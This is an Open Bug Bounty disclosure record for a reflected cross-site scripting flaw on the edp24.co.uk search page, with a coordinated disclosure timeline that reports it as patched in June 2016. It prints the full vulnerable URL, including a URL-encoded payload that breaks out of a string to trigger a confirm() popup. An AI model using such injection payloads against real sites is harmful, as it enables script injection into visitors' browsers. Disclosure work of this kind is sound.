edp24.co.uk XSS vulnerability

2016-03-29T14:20:00
ID OBB:143877
Type openbugbounty
Reporter Lewis
Modified 2016-06-22T07:26:00

Description

Vulnerable URL:
http://www.edp24.co.uk/home/search?numberOfItemsPerPage=10&sort=publishedDate_descending&filterToDate=&longTo=NaN&freeText=%22%2Bconfirm%28%27XSSPOSED%27%29%2B%22&selectedCategories=[]&includeSiteIds=[YarmouthMercury.d]&action=search&longitude=NaN&numberOfItemsToSearchPerPage=10&resultsSearch=&submitted=true&toDate=29%2F03%2F2016&excludeSiteIds=[]&longFrom=NaN&excludedCategories=[]&siteExternalID=yarmouthmercury.d&distanceInMiles=0.0&fromDate=&siteId=2.970&latFrom=NaN&latTo=NaN&facetQueries=publishedDate%3A[NOW%2FDAY-7DAYS+TO+NOW]&facetQueries=publishedDate%3A[NOW%2FYEAR+TO+NOW]&facetQueries=publishedDate%3A[NOW%2FDAY-30DAYS+TO+NOW]&facetQueries=publishedDate%3A[NOW%2FDAY+TO+NOW]&latitude=NaN&filterFromDate=&facetFields=tree_department.categorydimension.archant&publishDateInterval=uk.co.polopoly.search.util.DateInterval%40678fec9f
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 50275
Google Pagerank| 6
VIP website status:| No
Check edp24.co.uk SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 March, 2016 14:20 GMT
Generic security notifications sent to website owner| 29 March, 2016 14:22 GMT
Vulnerability details disclosed by researcher| 21 June, 2016 15:11 GMT
Vulnerability patched by the website owner| 22 June, 2016 07:26 GMT